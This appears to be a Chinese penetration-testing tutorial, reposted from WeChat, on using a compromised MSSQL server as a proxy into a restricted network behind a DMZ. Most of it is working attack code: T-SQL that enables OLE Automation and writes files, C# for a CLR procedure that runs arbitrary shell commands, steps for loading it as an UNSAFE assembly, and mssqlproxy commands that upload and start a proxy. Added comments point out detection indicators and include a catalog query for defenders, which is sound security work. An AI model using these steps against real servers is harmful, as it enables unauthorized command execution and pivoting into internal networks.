利用MSSQL搭建代理突破DMZ访问受限网络
2020-02-20 16:38:19 Author: mp.weixin.qq.com(查看原文) 阅读量:401 收藏

0x00 背景介绍

渗透测试中经常利用数据库连接突破 DMZ,前天看到有人分享利用 MSSQL 搭建代理突破 DMZ、访问不出网的内部应用资产的方法。Microsoft SQL Server 现在具备与 Microsoft Windows .NET Framework 的公共语言运行时 (CLR) 组件集成的功能。CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。CLR 可以使用 .NET Framework 语言编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。

0x01 环境部署

数据库服务:

演示环境:Windows Server 2008 R2 Standard

测试机地址:192.168.3.174

MSSQL版本:Microsoft SQL Server 2012 - 11.0.2100.60 (X64)

歪果大佬遇到的场景为:获取互联网侧服务器权限后,通过信息收集或常规渗透手段控制了 MSSQL 数据库;防火墙规则只放行 1433 端口,无法直接访问核心服务器,于是借助 MSSQL 数据库构造代理来访问内部资源服务。

0x02 文件操作

开启 Ole Automation Procedures(启用 sp_OACreate 等 OLE 自动化过程)

-- Turns on the OLE Automation procedures (sp_OACreate / sp_OAMethod / ... used further down).
-- 'show advanced options' has to be enabled first, and each change only takes effect after RECONFIGURE.
-- Defender note: both options are off by default; flipping them is a high-signal event, and sp_configure
-- records the "Configuration option ... changed" message in the SQL Server error log.
EXEC master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;EXEC master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;

关闭 Ole Automation Procedures(禁用 sp_OACreate 等 OLE 自动化过程)

-- Reverts the change above: disables the OLE Automation procedures and hides advanced options again.
-- Defender note: after this runs the current sp_configure value looks clean, so the enable/disable pair
-- leaves no catalog artifact; the error-log entries written by sp_configure (and any SQL Audit) are
-- what remains of it.
EXEC sp_configure 'show advanced options',1;reconfigure;EXEC sp_configure 'ole automation procedures',0;reconfigure;EXEC sp_configure 'show advanced options',0;reconfigure;

文件写入

-- Write test through OLE Automation: creates C:\windows\temp\c4.txt via Scripting.FileSystemObject
-- and writes the line 'C4' into it. The file is created by the sqlservr.exe process, so it is owned
-- by the SQL Server service account — a file-system indicator worth alerting on.
-- @t and @line are declared but never used; no sp_OADestroy is called, so the COM objects are only
-- released when the batch ends.
DECLARE @o int, @f int, @t int, @ret int
DECLARE @line varchar(8000)
EXEC sp_OACreate 'scripting.filesystemobject',@o out
-- createtextfile(path, overwrite=1): @f receives the TextStream handle
EXEC sp_OAMethod @o, 'createtextfile', @f out, 'C:\windows\temp\c4.txt', 1
EXEC @ret = sp_OAMethod @f, 'writeline', NULL ,'C4'

0x03 命令执行

using System;using System.Data;using System.Data.SqlClient;using System.Data.SqlTypes;using Microsoft.SqlServer.Server;using System.IO;using System.Diagnostics;using System.Text;
public partial class StoredProcedures
{
    /// <summary>
    /// CLR stored procedure that runs the supplied command through cmd.exe /C and returns its
    /// standard output to the caller as one row with a single NVARCHAR(4000) column named "output".
    /// </summary>
    /// <remarks>
    /// Starting a process from inside the database engine requires the assembly to be cataloged with
    /// PERMISSION_SET = UNSAFE (see the CREATE ASSEMBLY statement in section 0x03).
    /// Defender notes: the child cmd.exe has sqlservr.exe as its parent and runs under the SQL Server
    /// service account, so process-lineage monitoring (parent = sqlservr.exe) and UNSAFE entries in
    /// sys.assemblies are the two direct indicators. On SQL Server 2017+ the 'clr strict security'
    /// option treats every assembly as UNSAFE and refuses unsigned ones unless they are explicitly
    /// trusted or the database is TRUSTWORTHY, which blocks this pattern in a default configuration.
    /// </remarks>
    /// <param name="execCommand">Command line appended after "cmd.exe /C" without any quoting or
    /// validation — the caller's input is the command itself.</param>
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void cmd_exec (SqlString execCommand)
    {
        Process proc = new Process();
        proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
        proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
        // UseShellExecute must be false for output redirection to work.
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();

        // Create the record and specify the metadata for the columns.
        SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));
        // Mark the beginning of the result set.
        SqlContext.Pipe.SendResultsStart(record);

        // Set values for each column in the row (whole stdout in the one 4000-char column).
        record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());

        // Send the row back to the client.
        SqlContext.Pipe.SendResultsRow(record);
        // Mark the end of the result set.
        SqlContext.Pipe.SendResultsEnd();
        proc.WaitForExit();
        proc.Close();
    }
};

使用 csc.exe 编译 dll 文件

REM Compiles the CLR stored procedure source into a library DLL with the .NET 4 C# compiler.
REM The target framework has to match the CLR hosted by the server (SQL Server 2012 hosts CLR 4).
REM The resulting DLL is the artifact later cataloged with CREATE ASSEMBLY.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library d:\mssqlproxy\cmdexce.cs

写入编译的 dll 文件

-- Writes the compiled DLL to disk through an ADODB.Stream COM object (needs Ole Automation Procedures on).
-- The binary payload of the original post (a hex literal of the DLL bytes) has been elided from this page.
-- Defender note: the DLL lands in C:\windows\temp written by sqlservr.exe — same file-system indicator as 0x02.
DECLARE @ob INT;
EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;
-- Type 1 = adTypeBinary
EXEC sp_OASetProperty @ob, 'Type', 1;
EXEC sp_OAMethod @ob, 'Open';
EXEC sp_OAMethod @ob, 'Write', NULL, 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;
-- SaveToFile option 2 = adSaveCreateOverWrite
EXEC sp_OAMethod @ob, 'SaveToFile', NULL, 'c:\windows\temp\cmd_exec.dll', 2;
EXEC sp_OAMethod @ob, 'Close';
EXEC sp_OADestroy @ob;

执行系统命令

-- Catalogs the DLL as an UNSAFE assembly, binds it to a T-SQL procedure, runs it once, then removes both.
-- Loading with PERMISSION_SET = UNSAFE requires 'clr enabled' = 1 plus either a signed assembly or
-- TRUSTWORTHY ON on the database. Those three settings (clr enabled, TRUSTWORTHY, permission_set_desc =
-- 'UNSAFE' in sys.assemblies) are the catalog-level indicators to monitor.
-- Defender note: the DROP statements at the end remove the catalog entries again, so a point-in-time
-- catalog check misses short-lived installs; SQL Audit on schema-object changes (CREATE/DROP ASSEMBLY,
-- CREATE/DROP PROCEDURE) and process lineage from sqlservr.exe are the durable signals.
CREATE ASSEMBLY my_assembly
FROM 'C:\windows\temp\cmd_exec.dll'
WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
GO
cmd_exec 'ver'
DROP PROCEDURE cmd_exec
DROP ASSEMBLY my_assembly

0x04 环境测试

# Connects with mssqlproxy's patched impacket mssqlclient.py using Windows authentication.
# Everything that follows (sp_configure, CREATE ASSEMBLY ... UNSAFE) needs high-privilege rights
# (sysadmin or equivalent); a login of that level reachable from the DMZ is the actual exposure here.
python mssqlclient.py administrator@192.168.3.174 -windows-auth

# Interactive client command: copies reciclador.dll (mssqlproxy's proxy assembly) onto the server.
# Presumably implemented over the OLE Automation file-write path shown in 0x02 — confirm against the tool.
# Defender note: a DLL appearing under C:\windows\temp written by sqlservr.exe is the file-system indicator.
upload reciclador.dll C:\windows\temp\reciclador.dll

# Installs the CLR assembly server-side; on the SQL side this corresponds to the CREATE ASSEMBLY ... UNSAFE
# pattern of 0x03 (inferred from the tool's purpose — confirm in the mssqlproxy source).
# While it stays installed, the inventory query below lists it with its permission_set_desc.
python mssqlclient.py administrator@192.168.3.174 -windows-auth -install -clr assembly.dll

-- Inventory of CLR assemblies in the current database together with the files they were loaded
-- from and the T-SQL objects (procedures/functions) bound to them. For defenders this is the
-- catalog check: any row with permission_set_desc = 'UNSAFE' (or EXTERNAL_ACCESS) deserves review,
-- and af.content returns the assembly bytes for offline analysis.
-- Caveat: sys.assemblies and friends are database-scoped, so with USE msdb this only covers msdb;
-- run it in every database to inventory the whole instance.
USE msdb;
SELECT
    SCHEMA_NAME(o.[schema_id])   AS [schema_name],
    f.file_id,
    f.name + '.dll'              AS [file_name],
    a.clr_name,
    a.assembly_id,
    a.name                       AS [assembly_name],
    m.assembly_class,
    m.assembly_method,
    o.object_id                  AS [sp_object_id],
    o.name                       AS [sp_name],
    o.[type]                     AS [sp_type],
    a.permission_set_desc,
    a.create_date,
    a.modify_date,
    f.content
FROM sys.assembly_modules AS m
INNER JOIN sys.assemblies AS a
    ON a.assembly_id = m.assembly_id
INNER JOIN sys.assembly_files AS f
    ON f.assembly_id = a.assembly_id
INNER JOIN sys.objects AS o
    ON o.[object_id] = m.[object_id]

# -check verifies the uploaded assembly/procedure are in place; -start launches the proxy, which then
# runs inside the sqlservr.exe process.
# Defender note: once it runs, connections to internal hosts originate from the SQL Server service
# process, so egress from sqlservr.exe to anything beyond its normal dependencies is the network-level
# indicator; host-side, the firewall rule that only allows 1433 inbound is exactly what this sidesteps.
python mssqlclient.py administrator@192.168.3.174 -windows-auth -check -reciclador "C:\windows\temp\reciclador.dll"

python mssqlclient.py administrator@192.168.3.174 -windows-auth -start -reciclador "C:\windows\temp\reciclador.dll"

参考文章

https://github.com/blackarrowsec/mssqlproxy

https://www.blackarrow.net/mssqlproxy-pivoting-clr/

https://blog.netspi.com/attacking-sql-server-clr-assemblies/




文章来源: http://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247485007&idx=2&sn=ccbd7430303dd6e9f2ceb47bb90dbcb8&chksm=fa177a8ccd60f39aece5cae88c49b624d5c1820f1961bce052bed157d5a2d2ab6d0ff199a4a2#rd